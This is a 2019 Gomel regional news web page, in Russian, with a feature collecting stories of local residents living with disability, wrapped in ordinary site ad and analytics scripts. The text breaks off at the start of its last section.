<!DOCTYPE html>
<html lang="ru">
	<head>
		<meta property="og:title" content="Не сдаются, мечтают, творят: подборка трогательных историй гомельчан, для которых инвалидность не приговор"/>
<meta property="og:image" content="https://gomel.today/uploads/News/2019/01/25/506-nesdavat.jpg"/>
<meta property="og:type" content="article"/>
		<title>Не сдаются, мечтают, творят: подборка трогательных историй гомельчан, для которых инвалидность не приговор :: Сильные Новости — Гомель сегодня</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		
		<meta http-equiv="cache-control" content="public">
		<meta http-equiv="content-type" content="text/html; charset=UTF-8">		
		<meta name="robots" content="all">
		<meta name="document-state" content="dynamic">
		<meta name="revisit" content="3">
		<meta name="distribution" content="global">
		<meta name="audience" content="all">
		<meta name="publisher-location" content="by">
				
		<link rel="shortcut icon" type="image/gif" href="/favicon.gif">	
		<link href="https://fonts.googleapis.com/css?family=Roboto:400,500,700&amp;subset=cyrillic" rel="stylesheet">
		
		<link href="/templates/today/bootstrap/css/bootstrap.min.css" rel="stylesheet">
		<link href="/templates/today/css/style.css" rel="stylesheet" type="text/css" media="screen">
		<script src="/templates/today/js/jquery.js" type="text/javascript"></script>
		<script src="/templates/today/js/jquery.step.js" type="text/javascript"></script>
		<script src="/templates/today/bootstrap/js/bootstrap.min.js"></script>
		<script src="/templates/today/js/tools.js" type="text/javascript"></script>
		<script type="text/javascript" src="/templates/today/js/adriver.core.2.js"></script> 
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rss/rss-2.xml" title="Все материалы сайта Сильные Новости">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/gomel/rss/" title="Новости Гомельской области">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/belarus/rss/" title="Новости Беларуси">
		<link rel="alternate" type="application/rss+xml" href="http://gomel.today/rus/news/world/rss/" title="Мировые новости">
		
		<base href="https://gomel.today/"> 
		<script>
			var ave_path = "/";
			var ave_theme = "today";  
		</script>
		<script type='text/javascript'> (function() { var w = window, d = document, protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:', aml = typeof admixerML !== 'undefined' ? admixerML : { }; aml.fn = aml.fn || []; aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/'); aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/'); if (!w.admixerML) { var lodash = document.createElement('script'); lodash.id = 'amlScript'; lodash.async = true; lodash.type = 'text/javascript'; lodash.src = aml.cdnPath + 'scripts3/loader2.js'; var node = d.getElementsByTagName('script')[0]; node.parentNode.insertBefore(lodash, node); w.admixerML = aml; } })(); </script>
		<script type='text/javascript'> admixerML.fn.push(function() { admixerML.defineSlot({z: 
			'1a57c481-e6b6-4964-a46d-5043ae76cce1', ph: 'admixer_1a57c481e6b64964a46d5043ae76cce1_zone_9085_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '033d7154-161a-4441-b055-d3711546beb5', ph: 'admixer_033d7154161a4441b055d3711546beb5_zone_9086_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 		
			admixerML.defineSlot({z: '428e2a36-53d5-49ed-88c7-8e27ee98e7b7', ph: 'admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '3e3d8d76-026c-4d53-ac80-6ab6168fb68a', ph: 'admixer_3e3d8d76026c4d53ac806ab6168fb68a_zone_9088_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '23d1f7ac-c376-4ade-8e80-7a0d1a40362b', ph: 'admixer_23d1f7acc3764ade8e807a0d1a40362b_zone_9089_sect_2479_site_2247', i: 'inv-nets', zIndex: 9999999}); 
			admixerML.defineSlot({z: '9f9fc002-852a-4c97-a9cb-d1b8419260ec', ph: 'admixer_9f9fc002852a4c97a9cbd1b8419260ec_zone_25912_sect_8001_site_2247', i: 'inv-nets'});
			admixerML.singleRequest(); }); 
		
</script>
		<!-- Push-уведомления -->
		<script charset="UTF-8" src="//cdn.sendpulse.com/28edd3380a1c17cf65b137fe96516659/js/push/17dddc9de258763ae65d98c801237045_1.js" async></script>

		
		<script type="text/javascript" src="/templates/today/js/vverh.js"></script>
		
		</head>

	<body>
		
				
	<!-- (C)2000-2015 Gemius SA - gemiusAudience / odsgomel.org / Home Page -->
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = '.XqQ.Ws8oyVXECxDR2jXPLbvXtDkpS_CMr2Ss64S3G7..7';
// lines below shouldn't be edited
function gemius_pending(i) { window[i] = window[i] || function() {var x = window[i+'_pdata'] = window[i+'_pdata'] || []; x[x.length]=arguments;};};
gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
(function(d,t) {try {var gt=d.createElement(t),s=d.getElementsByTagName(t)[0],l='http'+((location.protocol=='https:')?'s':''); gt.setAttribute('async','async');
gt.setAttribute('defer','defer'); gt.src=l+'://gaby.hit.gemius.pl/xgemius.js'; s.parentNode.insertBefore(gt,s);} catch (e) {}})(document,'script');
//--><!]]>
</script>

		<!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter3051520 = new Ya.Metrika({
                    id:3051520,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/3051520" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
       <!--LiveInternet counter--><script type="text/javascript"><!--
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();//--></script><!--/LiveInternet-->
        <!-- Баннер №1 
<div id='admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247'></div> 
		<script type='text/javascript'> admixerML.fn.push(function() { admixerML.display('admixer_428e2a3653d549ed88c78e27ee98e7b7_zone_9087_sect_2479_site_2247'); }); </script> --> 
		 <div style="#background:linear-gradient(to right, #605b72 50%, #605b72 50%);" class="bann1">			
			<div class="container" style="margin:auto;">								
					
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=598" class="banner_max_width"><img style="width:100%" src="/modules/media/files/4-min.gif" alt="Альфаспринтер 24/01 - 27/01: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=598" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/4-min.gif" alt="Альфаспринтер 24/01 - 27/01: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=598" class="banner_small_width"><img style="width:100%" src="/modules/media/files/4-min.gif" alt="Альфаспринтер 24/01 - 27/01: " border="0" /></a>
							</div>
		</div>

		<!-- Яндекс --><!-- <div class="container">
<div id="yandex_rtb_R-A-150149-23"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-23",
                renderTo: "yandex_rtb_R-A-150149-23",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
	</script></div>  -->
		<header>
			<div class="container">
				<div class="pull-left">
					<a href="/" class="logo"><img src="/templates/today/images/logo.png" alt="" class="img-responsive"></a>
				</div>
				<div class="pull-right">
					<nav class="navbar navbar-default">	<div class="container-fluid">		<!-- Brand and toggle get grouped for better mobile display -->		<div class="navbar-header">			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">				<span class="icon-bar"></span>				<span class="icon-bar"></span>				<span class="icon-bar"></span>			</button>		</div>		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">			<ul class="nav navbar-nav list-inline">							<li><a href="/rus/news/gomel/">Гомель и область</a></li><li><a href="/rus/news/belarus/">Беларусь</a></li><li><a href="/rus/news/world/">В мире</a></li><li><a href="https://gomel.today/key/tag/%D0%A2%D0%B0%D0%BA%D0%B0%D1%8F%20%D0%B6%D0%B8%D0%B7%D0%BD%D1%8C">Такая жизнь</a></li>				<li>					<a href="/index.php?module=search&ts=0" class="sprite search"></a>				</li>				<li>					<a href="https://gomel.today/archive" class="sprite archive"></a>				</li>			</ul>		</div>	</div></nav>
				</div>
			</div>

			<div class="clearfix"></div>

			<nav>
				<div class="container text-center">
					<!-- <ul class="list-inline">	<li><a href="/map/">Районы</a></li><li><a href="key/tag/Главное">Главное</a></li><li><a href="key/tag/Криминал">Криминал</a></li><li><a href="key/tag/Происшествия">ДТП и ЧП</a></li><li><a href="key/tag/Авто">Авто</a></li><li><a href="key/tag/%D0%90%D1%84%D0%B8%D1%88%D0%B0">Афиша</a></li><li><a href="key/tag/Политика">Политика</a></li><li><a href="key/tag/Экономика">Экономика</a></li><li><a href="key/tag/Общество">Общество</a></li><li><a href="key/tag/Спорт">Спорт</a></li><li><a href="key/tag/Погода">Погода</a></li><li><a href="key/tag/Шапито">Шапито</a></li><li><a href="blogs">Блоги</a></li><li><a href="key/tag/%D0%93%D1%80%D0%B0%D0%B6%D0%B4%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B5_%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE">Гражданское общество</a></li></ul> --><nav class="navbar navbar-default">	<div class="container-fluid">		<!-- Brand and toggle get grouped for better mobile display -->		<div class="navbar-header">			<button type="button" class="navbar-toggle navbar-toggle2 collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-2" aria-expanded="false">				<span class="icon-bar"></span>				<span class="icon-bar"></span>				<span class="icon-bar"></span>			</button>		</div>		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-2">			<ul class="list-inline">							<li><a href="/map/">Районы</a></li><li><a href="key/tag/Главное">Главное</a></li><li><a href="key/tag/Криминал">Криминал</a></li><li><a href="key/tag/Происшествия">ДТП и ЧП</a></li><li><a href="key/tag/Авто">Авто</a></li><li><a href="key/tag/%D0%90%D1%84%D0%B8%D1%88%D0%B0">Афиша</a></li><li><a href="key/tag/Политика">Политика</a></li><li><a href="key/tag/Экономика">Экономика</a></li><li><a href="key/tag/Общество">Общество</a></li><li><a href="key/tag/Спорт">Спорт</a></li><li><a href="key/tag/Погода">Погода</a></li><li><a href="key/tag/Шапито">Шапито</a></li><li><a href="blogs">Блоги</a></li><li><a href="key/tag/%D0%93%D1%80%D0%B0%D0%B6%D0%B4%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B5_%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE">Гражданское общество</a></li>			</ul>		</div>	</div></nav>
				</div>
			</nav>
		</header>

		<main>
			
			<!-- Баннер №2 --> <div style="margin-bottom:10px; background-color: transparent;" class="container">
			
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=585" class="banner_max_width"><img style="width:100%" src="/modules/media/files/__bgpb_magicdeposits_winterversion_1130x200_.jpg" alt="Тривижн 11/01 - 31/01 2019: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=585" class="banner_middle_width"><img style="width:100%" src="/modules/media/files/__bgpb_magicdeposits_winterversion_1130x200_.jpg" alt="Тривижн 11/01 - 31/01 2019: " border="0" /></a>
				
					<a rel="nofollow" target="_blank" href="index.php?module=media&amp;id=585" class="banner_small_width"><img style="width:100%" src="/modules/media/files/__bgpb_magicdeposits_winterversion_1130x200_.jpg" alt="Тривижн 11/01 - 31/01 2019: " border="0" /></a>
							</div>

			<div class="container">
				<div class="row">
					<div class="col-md-8">
						<article itemscope itemtype="http://schema.org/Article">	
	<h1 itemprop="name">Не сдаются, мечтают, творят: подборка трогательных историй гомельчан, для которых инвалидность не приговор</h1>
		<ul class="list-inline small-desc">
			<li class="date">25 января 2019, 11:24</li>
			<li class="view"><i class="sprite sview"></i> 896</li>
			<li class="comment"><i class="sprite scomment"></i> 0</li>
		</ul>	
		<img src="/uploads/News/2019/01/25/506-nesdavat.jpg" alt="" class="img-responsive img-center img-mainphoto">
		<!-- Реклама Яндекс --> 
			<br>



<!-- Yandex.RTB R-A-150149-12 -->
<div id="yandex_rtb_R-A-150149-12"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-150149-12",
                renderTo: "yandex_rtb_R-A-150149-12",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>



<br>
		<div class="show_caption img-center">
			<div itemprop="description">
				<p> Звёзды... Их&nbsp;много. Я&nbsp;не&nbsp;о&nbsp;звёздах на&nbsp;ночном небе, не&nbsp;о&nbsp;звёздах кино и&nbsp;эстрады. Я&nbsp;о&nbsp;простых людях, тех, кто живёт рядом с&nbsp;нами и&nbsp;ничем вроде не&nbsp;отличается, а&nbsp;посмотришь в&nbsp;их&nbsp;глаза&nbsp;— как они сияют! Все судьбы этих людей&nbsp;— уникальны, любая из&nbsp;этих историй достойна стать бестселлером. Ровно пять лет назад мы&nbsp;начали проект «Преодоление». Проект, который позволяет рассказать о&nbsp;своих трудностях, невзгодах, счастье тем, кто столкнулся с&nbsp;проблемой инвалидности. На&nbsp;сегодня вышло 40&nbsp;выпусков проекта. Напомним некоторые истории.</p>
			</div>
			<h2> ДОБРОТА</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/6fe/6fe574668082cf6ca8d48d4e1cedab9a.jpg" style="width:740px;height:582px"><br></strong></p><p><strong>Старая стенка, ветхий диван. Возле высокой, похожей на&nbsp;больничную кровати сосредоточено всё бытие хозяина. Постель уже 30&nbsp;лет&nbsp;— единственный мир Сергея ГНИДЕНКОВА.</strong></p>
<p>На&nbsp;столике телефон, блокноты, салфетки, лекарства. На&nbsp;большом, на&nbsp;всю стену, ковре прикреплён календарь, полотно с&nbsp;кармашками для ручек, карандашей и&nbsp;необходимых вещей. И&nbsp;иконы, их&nbsp;много... </p>
<p>Юноша отслужил в&nbsp;армии, отучился на&nbsp;автослесаря, работал на&nbsp;заводе. Но&nbsp;в&nbsp;двадцать три года вдруг всё оборвалось: на&nbsp;спине появился фурункул. Прооперировали, но&nbsp;неудачно. Ноги стали «мёртвыми». </p>
<p>За&nbsp;эти долгие годы у&nbsp;Сергея были стадии и&nbsp;душевного подъёма, и&nbsp;разочарований. </p>
<p>—&nbsp;Иногда встаю, хожу по&nbsp;квартире, а&nbsp;потом... просыпаюсь, и&nbsp;вот она&nbsp;— суровая действительность... —&nbsp;говорит Сергей.</p>
<p>Но&nbsp;в&nbsp;тот момент, когда он&nbsp;выбросил всё дурное из&nbsp;головы, его стало посещать вдохновение. Толстенький рукописный блокнот, его книга стихов,&nbsp;— единственное, что есть у&nbsp;Сергея. Его радость и&nbsp;отрада.После публикации Сергею Гниденкову гомельчане подарили диктофон, ноутбук, а&nbsp;международный университет «МИТСО» на&nbsp;бесплатной основе помог Сергею освоить компьютер, обеспечил доступ в&nbsp;интернет. Мужчина нашёл много новых друзей, встретился со&nbsp;старыми.</p>
<h2>НЕПОСРЕДСТВЕННОСТЬ</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/10f/10f40bdedfbadba19f817c4a722ed061.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>Ульяша ОМЕЛЬЧЕНКО часто смотрит по&nbsp;телевизору балет и&nbsp;мечтает. Кажется, вот сейчас она встанет, сделает первое «па» и&nbsp;закружится в&nbsp;танце... Но&nbsp;ножки не&nbsp;подчиняются&nbsp;ей, и&nbsp;она снова устремляет свой взгляд на&nbsp;виртуозных танцовщиц. </strong></p>
<p>Когда мы&nbsp;писали об&nbsp;этой семье, Уле, у&nbsp;которой ДЦП, было пять лет. Девочка мечтает стать балериной. До&nbsp;сих пор. Но&nbsp;пока ей&nbsp;не&nbsp;под силу репетировать в&nbsp;хореографическом классе у&nbsp;станка. Она может разве что неуверенно стоять, опираясь на&nbsp;перила дивана. </p>
<p>—&nbsp;Мне часто сны снятся, что она ходит. Я&nbsp;верю, эти сны пророческие,&nbsp;— признаётся мама Ульяши.</p>
<p>Материал тронул сердце профессионального фотографа Елены Сериковой, и&nbsp;она устроила настоящую стилизованную фотосессию в&nbsp;хореографическом зале.&nbsp;35&nbsp;снимков в&nbsp;чудесном альбоме фотограф подарила семье девочки. </p>
<h2>БОРЬБА</h2>
<p><strong>Двенадцать лет назад Александр ТИМОФЕЕВ на&nbsp;спор спрыгнул с&nbsp;пешеходного моста в&nbsp;парке. Перелом позвоночника. Инвалидная коляска. <br></strong></p><p><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/9fa/9fada45fce98849844811a9eb0156693.jpg" style="width:740px;height:490px"><br><strong></strong></p>
<p>—&nbsp;До&nbsp;берега доплыл сам, потом потерял сознание. Наутро очнулся, хотел встать и&nbsp;не&nbsp;смог... Понял&nbsp;— допрыгался,&nbsp;— вспоминает Саша. —&nbsp;Про­оперировали. Некоторое время жил в&nbsp;интернате для инвалидов и&nbsp;престарелых. Потом получил квартиру.</p>
<p>От&nbsp;«горячего» молодого человека&nbsp;— сироты&nbsp;— после случившегося отвернулась родная сестра, которая впоследствии трагически погибла. Семнадцатилетний юноша остался буквально один на&nbsp;один с&nbsp;собой. Было всё: угнетённое состояние, депрессия, нежелание что-то предпринимать. </p>
<p>Но&nbsp;всё это уже позади. Сейчас Александр увлекается армрестлингом, гонками на&nbsp;колясках, дарт­сом, он&nbsp;призёр многочисленных соревнований. К&nbsp;тому&nbsp;же играет в&nbsp;баскетбол, танцует. Да&nbsp;чем он&nbsp;только не&nbsp;занимается! </p>
<p>Не&nbsp;без нашего участия Саше предложили работу админи­стратора в&nbsp;Гомельском областном клиническом госпитале инвалидов Отечественной войны. Ему установили подъёмник и&nbsp;обеспечили беспрепятственный путь от&nbsp;дома до&nbsp;рабочего места. Он&nbsp;успешно отработал на&nbsp;протяжении года&nbsp;— именно столько времени длится программа трудовой адаптации для людей с&nbsp;инвалидностью. </p>
<h2>ЦЕЛЕУСТРЕМЛЁННОСТЬ</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/25a/25a1c79166c813200549c52cd18f4be5.jpg" style="width:740px;height:569px"><br></strong></p><p><strong>Когда мы&nbsp;познакомились с&nbsp;Андреем АНТОНЕНКО, парнем с&nbsp;ДЦП, у&nbsp;него был ещё и&nbsp;хронический вирусный гепатит С.&nbsp;На&nbsp;данный момент у&nbsp;него всё в&nbsp;норме&nbsp;— он&nbsp;победил «ласкового убийцу».</strong></p>
<p>Андрей&nbsp;— второй ребёнок в&nbsp;семье. Родился весом всего кило триста, трудные роды, и&nbsp;как следствие, неутешительный диагноз&nbsp;— детский церебральный паралич. Уход из&nbsp;семьи отца, переживания мамы. А&nbsp;потом ещё одно испытание&nbsp;— заболел гепатитом С.&nbsp;Другой&nbsp;бы опустил руки, замкнулся, ушёл в&nbsp;себя. Однако каждодневная борьба за&nbsp;то, чтобы быть таким как все, только укрепила характер мальчика. Андрей был зачислен в&nbsp;школу, когда ему ещё и&nbsp;шести не&nbsp;было. </p>
<p>Несмотря на&nbsp;то, что передвигается Андрей только с&nbsp;посторонней помощью, он&nbsp;часто гуляет. Всё благодаря подъёмнику, который установили в&nbsp;подъезде с&nbsp;непосредственным участием местной власти. А&nbsp;ещё Андрей побывал на&nbsp;выступлении известного мотивирующего оратора Ника Вуйчича в&nbsp;Минске и&nbsp;получил в&nbsp;подарок книгу Ника с&nbsp;автографом.</p>
<p>Настоящим&nbsp;же прорывом стала победа над «ласковым убийцей». С&nbsp;помощью СМИ семья Андрея нашла спонсоров для лечения заболевания. Андрей готов поделиться своей историей борьбы. Звоните: 8 (044) 709-38-66 (velcom) и&nbsp;8 (033) 650-43-84 (MTC). </p>
<h2>ИСКРЕННОСТЬ</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/1ca/1ca62a1d1bc874637e34d884ce5caeeb.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>...Было темно и&nbsp;прохладно. Настя ЮРЧЕНКО шла по&nbsp;улице Быховской домой. Этим маршрутом она возвращалась из&nbsp;гимназии 
№&nbsp;71&nbsp;каждый день. Сегодня уличные фонари не&nbsp;горели, словно предвещая беду. Темно и&nbsp;прохладно. Настя шагнула на&nbsp;зебру. Удар, визг тормозов, белый больничный потолок...</strong></p>
<p>Настя попала в&nbsp;реанимацию в&nbsp;очень тяжёлом состоянии, перенесла несколько сложных операций, три месяца находилась в&nbsp;коме. В&nbsp;те&nbsp;страшные для семьи дни общественные организации и&nbsp;просто неравнодушные люди взяли под свою опеку Настю и&nbsp;её&nbsp;семью. Деньги на&nbsp;лечение Насте Юрченко собирал буквально весь Гомель. За&nbsp;короткий срок была собрана нужная сумма для реа­билитации в&nbsp;Израиле&nbsp;— около 150 тысяч долларов. </p>
<p>Сейчас Анастасия пусть плохо, но&nbsp;пытается ходить, когда её&nbsp;ведут за&nbsp;руки. Сама держит ложку и&nbsp;ест. Читает книги и&nbsp;работает за&nbsp;компьютером. Разговаривает. Обучается на&nbsp;дому... Учитывая&nbsp;то, что травмы были несовместимы с&nbsp;жизнью, можно говорить о&nbsp;чуде. О&nbsp;том, что с&nbsp;ней случилось, Настя старается не&nbsp;думать. Мечтает вернуться к&nbsp;нормальной жизни, быть вместе с&nbsp;семьёй, учиться, заниматься любимыми делами и&nbsp;радоваться каждому дню. 
—&nbsp;Настя, как себя чувствуешь?
—&nbsp;Хорошо.
—Ты помнишь, что с&nbsp;тобой случилось?
—&nbsp;Да.
—&nbsp;Когда вы­шла из&nbsp;комы, что почувствовала?
—&nbsp;Я&nbsp;не&nbsp;понимала, что происходит, чувствовала боль и&nbsp;страх. 
—&nbsp;И&nbsp;сейчас у&nbsp;неё боль,&nbsp;— говорит мама Насти. —&nbsp;Одно дело, когда инвалидность врождённая, другое&nbsp;— когда ты&nbsp;ходил, бегал, танцевал... </p>
<h2>ВЫНОСЛИВОСТЬ</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/d2c/d2ce4787fd70b0156f0f9adaf750d3ef.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>Как с&nbsp;такими диагнозами маленького сына жить дальше, Олеся не&nbsp;знала. Знала одно&nbsp;— жить нужно. У&nbsp;маленького Матвея КУРБЕКО наиболее тяжёлые врождённые пороки развития в&nbsp;урологии, при которых отсутствует передняя стенка мочевого пузыря, живота и&nbsp;уретра. </strong></p>
<p>У&nbsp;Матвея было полное недержание. Каждые полчаса-час Олеся меняла ему подгузники. Из-за проблемы со&nbsp;стулом маме приходилось тщательно рассчитывать меню малыша. И&nbsp;так день за&nbsp;днём. </p>
<p>А&nbsp;Матвей... Он&nbsp;стал намного взрослее своих ровесников&nbsp;— серьёзный, вдумчивый и&nbsp;спокойный. Полтора года назад сербские специалисты провели сложнейшую операцию Матвею. На&nbsp;неё и&nbsp;двухнедельное восстановление требовалось почти 15&nbsp;тысяч евро, которые собирали всей республикой. В&nbsp;городах Беларуси и&nbsp;в&nbsp;Гомеле проходил ряд благотворительных концертов и&nbsp;мероприятий в&nbsp;пользу маленького мальчика.
—&nbsp;Кроме вмешательства по&nbsp;устранению недержания, нам сделали пупок, пластику полового органа&nbsp;— «собирали» воедино, чтобы он&nbsp;выглядел нормально, как у&nbsp;всех. Убирали рубцы на&nbsp;мочевом пузыре, которые образовались после операций, сделанных сразу после рождения малыша, свели кости&nbsp;— при нашей патологии тазовые кости немного разъединены,&nbsp;— говорит мама Олеся. </p>
<p>Всё прошло успешно. Сейчас мальчик ходит в&nbsp;детский садик. </p>
<h2>МУЖЕСТВО</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/332/33287a305e9d2df469649a47b040e62a.jpg" style="width:740px;height:493px"><br></strong></p><p><strong>Я&nbsp;уже третий стульчик истоптала,&nbsp;— встречая нас у&nbsp;порога, вздыхала Елена МИСОЧЕНКО. —&nbsp;Видите, здесь ножки совсем стёрлись, так мне наконечники удобные сделали. Так вот и&nbsp;хожу...</strong></p>
<p>И&nbsp;не&nbsp;просто ходит&nbsp;— всё по&nbsp;дому делает. С&nbsp;тех пор, как потеряла обе ноги, а&nbsp;это случилось, когда Елене было всего девятнадцать лет, она многому научилась. Главное из&nbsp;этих умений&nbsp;— умение жить.
...Стройка. Гомель.&nbsp;1960&nbsp;год. Юная Лена в&nbsp;работе&nbsp;— огонь. Трудится на&nbsp;бетономешалке наравне с&nbsp;мужчинами. Все хвалят. Месяц как замуж вышла. Вечер. Последний замес. Бетон нужно счищать сразу, иначе засохнет. Рабочим приходится лезть внутрь бетономешалки и&nbsp;отбивать цемент кельмами. На&nbsp;этот раз бетономешалка большая, литров на&nbsp;триста. Да&nbsp;и&nbsp;электричества нет&nbsp;— на&nbsp;линии что-то случилось...</p>
<p>—&nbsp;Ну, я&nbsp;и&nbsp;полезла чистить. Выключила кнопки на&nbsp;растворомешалке, а&nbsp;их, девочки, часто заедало, уже отбила одну сторону, и&nbsp;тут свет дали, бетономешалка заработала... И&nbsp;меня закрутило... </p>
<p>Супруг жену не&nbsp;оставил&nbsp;— вместе прожили 45&nbsp;лет. Двух сыновей родили. Сейчас мужа нет в&nbsp;живых. Младшего сына тоже. </p>
<p>В&nbsp;общении казалось, будто вся жизнь Елены Михайловны соткана из&nbsp;трагедий, потерь и&nbsp;лишений. Тем не&nbsp;менее, были в&nbsp;ней и&nbsp;светлые полосы, были пусть и&nbsp;маленькие, но&nbsp;радости. Есть у&nbsp;женщины две внучки, правнук и&nbsp;правнучка. </p>
<p>Были и&nbsp;увлечения, и&nbsp;работа, и&nbsp;ещё много чего хорошего. Она и&nbsp;машину водила&nbsp;— «запорожец»,&nbsp;— и&nbsp;пела. Восемнадцать лет Елена Михайловна отработала швеёй, передовик производства, вставала в&nbsp;четыре утра и&nbsp;ложилась, когда все уже спали. </p>
<p>Хоть и&nbsp;прошло с&nbsp;момента трагедии почти 60&nbsp;лет, а&nbsp;память жива. Жива и&nbsp;боль. Но&nbsp;Елена Михайловна смогла пережить это. </p>
<p>—&nbsp;Пережила, пережила... —&nbsp;повторяла Елена Михайловна, когда мы&nbsp;были у&nbsp;неё в&nbsp;гостях. —&nbsp;Как? Просто взяла себя в&nbsp;руки. </p>
<h2>УПОРСТВО</h2>
<p><strong><img src="https://newsgomel.by/upload/sotbit.htmleditoraddition/917/91748558b5586e1effc0a83241007e59.jpg" style="width:414px;height:740px"><br></strong></p><p><strong>М-м-ма... 
—&nbsp;Не&nbsp;понимаю,&nbsp;— улыбается Любовь НЕДБАЙ, мама акробата, который упал с&nbsp;высоты, выполняя трюк. —&nbsp;Раньше вообще молчал, а&nbsp;после занятий с&nbsp;логопедом пытается сказать «мама» и&nbsp;«Аня». </strong></p>
<p>...Япония. Невероятно гибкий парень покоряет зрителей трюками, работая под куполом цирка без страховки. Казалось, мечта сбылась&nbsp;— взгляды сотен людей прикованы к&nbsp;нему, ведь он&nbsp;— самый верхний из&nbsp;акробатов. Номер называется «Подкидные доски». Лёгкий и&nbsp;ловкий Вадим Недбай взлетает на&nbsp;стул... С&nbsp;этим номером под руководством Дмитрия Досова он&nbsp;выступает не&nbsp;первый раз. «Подкидные доски»&nbsp;— настоящий гвоздь программы и&nbsp;в&nbsp;Японии. Трагедия происходит прямо на&nbsp;премьере. С&nbsp;пятиметровой высоты он&nbsp;падает, как говорят, «камнем».</p>
<p>...О причинах трагедии почти ничего неизвестно. Говорят, не&nbsp;было резинового мата, который должен был лежать, просто цемент и&nbsp;ковровое покрытие. И&nbsp;сломалось кресло от&nbsp;того, что были микротрещины в&nbsp;трубе. </p>
<p>После падения Вадим сразу теряет сознание, потом встаёт, трясёт головой и&nbsp;даже спрашивает: «Что случилось?» Потом снова отключается, у&nbsp;него начинает западать язык. </p>
<p>Кома... </p>
<p>Сейчас Вадим лежит в&nbsp;специальной кровати, которую ему купил московский Росгосцирк после того, как случилась трагедия. Одну из&nbsp;сложнейших операций и&nbsp;сетку оплатил Эдгард Запашный. </p>
<p>Вадим своих узнаёт, радуется их&nbsp;приходу. Не&nbsp;забывают парня классный руководитель и&nbsp;одноклассники. Приезжал к&nbsp;нему и&nbsp;парень из&nbsp;его труппы. Ну&nbsp;а&nbsp;мама... Мама ежедневно, ежесекундно совершает подвиг&nbsp;— подвиг заботы, настоящей материнской любви и&nbsp;самоотдачи.</p>
<h2>ОПТИМИЗМ</h2>
